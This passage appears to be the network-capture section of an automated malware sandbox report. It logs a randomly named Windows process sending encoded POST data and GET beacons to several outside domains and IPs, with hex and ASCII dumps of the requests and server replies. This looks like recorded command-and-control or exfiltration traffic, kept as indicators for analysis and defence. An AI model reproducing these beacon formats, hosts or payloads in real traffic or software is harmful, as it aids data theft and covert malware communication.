                                                                                              Content-Length: 1246
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.jobworklanka.online/ikh0/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 6f 74 5a 63 79 65 48 58 52 73 55 61 6b 39 64 66 74 38 76 48 41 33 71 6b 4b 57 2f 36 39 78 51 6c 64 31 6e 4c 32 52 75 76 47 57 34 6f 76 6a 66 30 41 5a 53 65 63 6f 4f 64 4c 5a 6e 68 4c 30 39 79 4d 7a 43 47 44 58 79 74 49 76 6e 63 79 67 36 41 45 7a 2b 70 70 62 6d 6f 63 59 4e 72 6f 67 59 2b 64 6a 41 70 51 35 69 6a 62 47 76 70 72 4f 59 48 6d 79 68 6b 77 4c 6c 78 35 52 63 45 4e 31 4f 58 31 6c 48 47 31 6b 61 70 63 78 57 49 62 73 32 31 45 62 44 6e 42 57 52 63 32 35 57 4d 45 6d 57 35 50 6b 36 64 68 36 45 67 51 79 79 30 30 76 49 7a 46 75 2b 56 6b 31 77 53 61 55 58 63 6b 45 36 51 4e 49 4f 50 52 57 4a 4a 49 38 42 58 66 36 79 62 47 58 51 2b 50 46 7a 4c 45 75 75 78 32 2f 6b 52 35 69 2f 4a 52 66 77 2b 7a 44 4f 38 62 59 2b 4e 70 55 35 6a 6b 5a 54 56 69 45 32 69 36 55 72 4b 79 65 46 32 36 4a 43 4e 61 46 2b 72 78 69 51 70 67 76 63 59 45 47 38 2f 6e 46 62 50 73 46 31 67 53 36 6c 36 33 67 46 4d 58 45 75 58 64 4e 38 46 51 66 50 44 67 35 32 6c 71 47 54 76 43 4b 39 47 33 54 79 6c 47 39 67 45 78 4c 33 7a [TRUNCATED]
                                                                                              Data Ascii: I4ET5=otZcyeHXRsUak9dft8vHA3qkKW/69xQld1nL2RuvGW4ovjf0AZSecoOdLZnhL09yMzCGDXytIvncyg6AEz+ppbmocYNrogY+djApQ5ijbGvprOYHmyhkwLlx5RcEN1OX1lHG1kapcxWIbs21EbDnBWRc25WMEmW5Pk6dh6EgQyy00vIzFu+Vk1wSaUXckE6QNIOPRWJJI8BXf6ybGXQ+PFzLEuux2/kR5i/JRfw+zDO8bY+NpU5jkZTViE2i6UrKyeF26JCNaF+rxiQpgvcYEG8/nFbPsF1gS6l63gFMXEuXdN8FQfPDg52lqGTvCK9G3TylG9gExL3zvRGhydgen/piOBTYsIK93eqNT5WuHPHs8Rmo1qilId7csvVasJQFCdTcp/XReg9e+WWZGm/LaEtB38OdFDcN4kC2ow0StIQoTG02hmH3HMrsAwfHPozc9QRhdjRXsVgYGnGw4VrtgVOXvecbdnTuUAbOcIdY8cZqbUrC1EIrytG8H+cwSMfuqj3j+cJFGeR7ZQ2Jq6nF56PnGjbTCSExkpYEvxnqQjZi1AXa+edABf4XocCmqwbNFgReoN4+gtL1Nsf2LKQKwHvmuHzUcGHsWBEIrrwFuCXyknCpPCdZQ7WIGEtpwwf/old8aThlbAFxfPptRUtzvfuMbZvc7uuN8YqaMuP8VD90RYSqlCAqIzkwGbewPMLGpOUQsHY6WwLqfbFnPmNqalpbI2NZKpLUS7eGN3bprYatVmsyfM4L3CzrbEyra3DTUlJ+pUJOVswovnBS/82z5iB4XZVKJyuRx8kTiEuv2l4nKnev9G8NephV0EhDVuS7J5piQ1XlQcaIt613k/IMRgz7DlA2z9F4T2JVzvD9znA/bpEoF62hsX2w+FgXpAPId6CbONKD8vueDT+Z6OvwxazG+PKW51OqU7NSpaOpj6Rkbj6jY73r8XwPJz5G0S50itMFjbNY3ogQkI/bj4Gu9pvSxCrnFXZIuT46rgefDrnW0I [TRUNCATED]
Oct 8, 2024 15:54:50.680727959 CEST | 500 | IN | HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 08 Oct 2024 13:54:50 GMT
                                                                                              Server: Apache
                                                                                              X-Xss-Protection: 1; mode=block
                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Content-Length: 196
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID: 24 | Source IP: 192.168.2.6 | Source Port: 50011 | Destination IP: 91.184.0.200 | Destination Port: 80 | PID: 2356 | Process: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:54:52.654541969 CEST | 572 | OUT | GET /ikh0/?5xn03=7vMx2HlPWl&I4ET5=lvx8xqKuEeZXr5IXmtDcOSOuXgPzygssZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1uL6vU7t5jilJUCYKPYTSTWzBlftPtFsf3/wj5zdrQAyp0VL/hTg= HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.jobworklanka.online
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Oct 8, 2024 15:54:53.318254948 CEST | 500 | IN | HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 08 Oct 2024 13:54:53 GMT
                                                                                              Server: Apache
                                                                                              X-Xss-Protection: 1; mode=block
                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Content-Length: 196
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID: 25 | Source IP: 192.168.2.6 | Source Port: 50012 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 2356 | Process: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:54:58.377140045 CEST | 808 | OUT | POST /h7lb/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.dyme.tech
                                                                                              Origin: http://www.dyme.tech
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 210
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.dyme.tech/h7lb/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 63 5a 6e 6e 5a 35 6c 77 39 6d 56 6f 73 4a 53 4a 62 2f 6b 54 33 48 37 47 37 55 79 74 4a 6e 75 7a 36 55 46 63 34 37 46 54 4d 6f 44 4a 6b 73 59 58 73 48 55 58 49 77 39 50 76 56 31 67 78 38 56 52 5a 53 77 71 6d 7a 76 78 30 45 47 7a 2b 49 51 52 62 73 7a 31 61 4f 77 38 69 4b 6e 4c 74 4e 6f 61 73 77 34 4a 38 59 6d 42 39 4f 34 66 56 49 42 43 2f 30 36 6b 6f 38 2b 69 44 57 46 55 4e 44 54 49 76 4a 64 48 75 39 68 41 47 6e 56 55 6a 54 68 69 57 64 46 46 39 32 50 64 41 79 43 46 6a 63 30 4b 74 75 64 39 36 7a 2b 73 59 65 4d 64 4c 59 4f 77 69 65 35 62 37 4a 73 4a 76 42 77 69 2b 56 4a 55 70 67 54 50 53 61 41 32 73 36 7a 49
                                                                                              Data Ascii: I4ET5=cZnnZ5lw9mVosJSJb/kT3H7G7UytJnuz6UFc47FTMoDJksYXsHUXIw9PvV1gx8VRZSwqmzvx0EGz+IQRbsz1aOw8iKnLtNoasw4J8YmB9O4fVIBC/06ko8+iDWFUNDTIvJdHu9hAGnVUjThiWdFF92PdAyCFjc0Ktud96z+sYeMdLYOwie5b7JsJvBwi+VJUpgTPSaA2s6zI


Session ID: 26 | Source IP: 192.168.2.6 | Source Port: 50013 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 2356 | Process: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:55:00.920562029 CEST | 832 | OUT | POST /h7lb/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.dyme.tech
                                                                                              Origin: http://www.dyme.tech
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 234
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.dyme.tech/h7lb/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 63 5a 6e 6e 5a 35 6c 77 39 6d 56 6f 74 70 43 4a 5a 63 63 54 79 6e 37 46 2b 55 79 74 53 33 75 2f 36 55 4a 63 34 2f 31 44 4d 61 6e 4a 6c 4f 51 58 76 47 55 58 4c 77 39 50 36 6c 31 6c 31 38 56 47 5a 53 30 55 6d 33 72 78 30 45 43 7a 2b 4b 49 52 62 37 6e 36 62 65 77 69 70 71 6e 4e 6a 74 6f 61 73 77 34 4a 38 63 47 72 39 4f 67 66 56 34 78 43 2b 57 65 6c 6c 63 2b 68 54 47 46 55 47 6a 54 4d 76 4a 64 31 75 34 45 6c 47 6c 74 55 6a 53 78 69 48 76 74 45 32 32 50 62 4f 53 43 52 67 4f 73 61 31 73 63 45 31 51 2b 37 4d 39 51 71 4b 75 50 71 2b 74 35 34 70 5a 4d 4c 76 44 6f 51 2b 31 4a 2b 72 67 72 50 41 4e 4d 52 6a 4f 57 72 32 33 35 45 42 53 59 6d 53 64 58 43 6a 77 52 2b 6b 7a 2b 69 70 67 3d 3d
                                                                                              Data Ascii: I4ET5=cZnnZ5lw9mVotpCJZccTyn7F+UytS3u/6UJc4/1DManJlOQXvGUXLw9P6l1l18VGZS0Um3rx0ECz+KIRb7n6bewipqnNjtoasw4J8cGr9OgfV4xC+Wellc+hTGFUGjTMvJd1u4ElGltUjSxiHvtE22PbOSCRgOsa1scE1Q+7M9QqKuPq+t54pZMLvDoQ+1J+rgrPANMRjOWr235EBSYmSdXCjwR+kz+ipg==


Session ID: 27 | Source IP: 192.168.2.6 | Source Port: 50014 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 2356 | Process: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:55:03.480688095 CEST | 1845 | OUT | POST /h7lb/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.dyme.tech
                                                                                              Origin: http://www.dyme.tech
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 1246
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.dyme.tech/h7lb/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 63 5a 6e 6e 5a 35 6c 77 39 6d 56 6f 74 70 43 4a 5a 63 63 54 79 6e 37 46 2b 55 79 74 53 33 75 2f 36 55 4a 63 34 2f 31 44 4d 61 76 4a 6b 39 49 58 73 6c 38 58 4b 77 39 50 6d 31 31 6b 31 38 56 2b 5a 53 4e 54 6d 33 6e 48 30 47 71 7a 38 70 41 52 4c 61 6e 36 52 65 77 69 6d 4b 6e 49 74 4e 6f 50 73 77 4a 43 38 59 69 72 39 4f 67 66 56 2b 64 43 35 45 36 6c 6e 63 2b 69 44 57 46 49 4e 44 54 6b 76 49 31 66 75 34 42 51 47 52 5a 55 6b 79 42 69 46 36 78 45 71 6d 50 5a 4e 53 44 57 67 4f 52 64 31 73 42 37 31 54 69 52 4d 2f 4d 71 4c 72 75 73 71 74 35 66 34 66 6b 74 7a 43 51 6e 2f 53 70 31 79 44 66 66 4f 73 41 65 73 64 65 66 39 43 5a 61 4d 43 4e 59 66 66 48 51 74 51 70 76 6b 77 54 59 38 42 71 35 55 69 69 45 74 33 63 78 46 4c 36 2b 77 68 64 4c 4e 58 33 7a 36 57 74 71 54 6e 32 51 30 44 73 41 6e 34 55 73 65 76 2f 7a 62 41 4e 68 64 70 6f 36 79 65 45 76 72 74 49 63 76 45 45 43 35 39 37 6c 61 46 36 6d 6e 50 50 6c 45 69 52 68 52 36 77 52 58 5a 31 33 4a 6d 6b 61 2f 49 51 65 53 70 41 45 37 47 73 2b 67 71 75 4b [TRUNCATED]
                                                                                              Data Ascii: I4ET5=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 [TRUNCATED]


Session ID: 28 | Source IP: 192.168.2.6 | Source Port: 50015 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 2356 | Process: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:55:06.025427103 CEST | 562 | OUT | GET /h7lb/?I4ET5=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0U8wzgLDyi+d9/jciraahzpwjZL5E+FLfjf2KFU0ZNlPPutFUmc0=&5xn03=7vMx2HlPWl HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.dyme.tech
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Oct 8, 2024 15:55:06.484975100 CEST | 414 | IN | HTTP/1.1 200 OK
                                                                                              Server: openresty
                                                                                              Date: Tue, 08 Oct 2024 13:55:06 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 274
                                                                                              Connection: close
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 49 34 45 54 35 3d 52 62 50 48 61 4f 52 75 71 33 56 4c 73 49 76 42 49 65 6c 4a 35 47 4f 35 31 47 47 4d 58 56 69 74 78 55 74 43 6d 73 52 58 47 49 36 6a 79 74 59 64 33 57 56 48 41 79 67 71 73 67 39 6d 34 73 78 37 49 58 67 6c 6f 46 58 2b 38 47 2b 76 79 64 51 5a 4a 4c 50 30 55 38 77 7a 67 4c 44 79 69 2b 64 39 2f 6a 63 69 72 61 61 68 7a 70 77 6a 5a 4c 35 45 2b 46 4c 66 6a 66 32 4b 46 55 30 5a 4e 6c 50 50 75 74 46 55 6d 63 30 3d 26 35 78 6e 30 33 3d 37 76 4d 78 32 48 6c 50 57 6c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?I4ET5=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0U8wzgLDyi+d9/jciraahzpwjZL5E+FLfjf2KFU0ZNlPPutFUmc0=&5xn03=7vMx2HlPWl"}</script></head></html>


Session ID: 29 | Source IP: 192.168.2.6 | Source Port: 50021 | Destination IP: 43.242.202.169 | Destination Port: 80 | PID: 2356 | Process: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:55:25.977612972 CEST | 817 | OUT | POST /e0nr/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.mizuquan.top
                                                                                              Origin: http://www.mizuquan.top
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 210
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.mizuquan.top/e0nr/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 4b 74 58 63 32 31 38 6b 45 41 59 2f 54 6d 73 33 71 45 49 68 55 77 5a 77 73 7a 6b 77 72 41 6b 7a 54 5a 65 64 7a 64 50 47 56 7a 75 61 4f 37 4b 70 70 53 47 44 63 52 46 38 36 76 48 69 4a 64 42 47 63 42 32 5a 39 46 2b 45 32 38 30 63 34 53 46 34 4c 30 61 33 55 4e 69 51 52 43 47 50 2f 61 50 33 52 48 4c 75 36 6e 73 62 58 51 39 65 65 6c 77 58 61 64 74 30 6f 4d 36 50 53 37 45 4f 4f 76 48 6d 45 50 47 2f 55 57 53 4b 69 2b 6d 45 4e 56 41 79 6f 51 6f 50 65 68 41 49 34 62 4f 63 48 39 47 67 4d 43 53 74 53 31 46 59 49 77 4e 47 45 4d 45 7a 2b 4a 57 46 4d 4a 38 75 2f 31 2f 47 44 4f 2b
                                                                                              Data Ascii: I4ET5=H9Rq2Rs7eYeiaKtXc218kEAY/Tms3qEIhUwZwszkwrAkzTZedzdPGVzuaO7KppSGDcRF86vHiJdBGcB2Z9F+E280c4SF4L0a3UNiQRCGP/aP3RHLu6nsbXQ9eelwXadt0oM6PS7EOOvHmEPG/UWSKi+mENVAyoQoPehAI4bOcH9GgMCStS1FYIwNGEMEz+JWFMJ8u/1/GDO+
Oct 8, 2024 15:55:26.846904993 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 08 Oct 2024 13:55:26 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 548
                                                                                              Connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              30 | 192.168.2.6 | 50022 | 43.242.202.169 | 80 | 2356 | C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              Oct 8, 2024 15:55:28.532839060 CEST | 841 | OUT | POST /e0nr/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.mizuquan.top
                                                                                              Origin: http://www.mizuquan.top
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 234
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.mizuquan.top/e0nr/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 75 70 58 51 78 70 38 6f 30 41 66 7a 7a 6d 73 39 4b 45 32 68 55 4d 5a 77 6f 69 35 77 39 77 6b 39 58 64 65 50 43 64 50 4c 31 7a 75 49 75 37 50 78 4a 53 64 44 63 56 6a 38 34 37 48 69 4a 5a 42 47 59 46 32 5a 4b 70 39 43 6d 38 32 61 34 53 4c 37 37 30 61 33 55 4e 69 51 51 6d 34 50 2f 69 50 33 43 50 4c 76 59 50 76 45 6e 51 2b 5a 65 6c 77 61 36 64 68 30 6f 4d 59 50 58 54 75 4f 4d 48 48 6d 45 66 47 2f 47 75 54 42 69 2b 73 4b 74 55 42 32 6f 68 50 4e 39 4e 41 58 4a 2f 36 64 57 42 51 68 36 44 49 78 68 31 6d 4b 59 51 50 47 47 55 32 7a 65 4a 38 48 4d 78 38 38 6f 35 59 4a 33 72 64 37 70 61 47 68 49 4b 37 54 79 76 78 32 4b 59 52 42 67 35 64 4c 41 3d 3d
                                                                                              Data Ascii: I4ET5=H9Rq2Rs7eYeiaupXQxp8o0Afzzms9KE2hUMZwoi5w9wk9XdePCdPL1zuIu7PxJSdDcVj847HiJZBGYF2ZKp9Cm82a4SL770a3UNiQQm4P/iP3CPLvYPvEnQ+Zelwa6dh0oMYPXTuOMHHmEfG/GuTBi+sKtUB2ohPN9NAXJ/6dWBQh6DIxh1mKYQPGGU2zeJ8HMx88o5YJ3rd7paGhIK7Tyvx2KYRBg5dLA==
                                                                                              Oct 8, 2024 15:55:29.531091928 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 08 Oct 2024 13:55:29 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 548
                                                                                              Connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
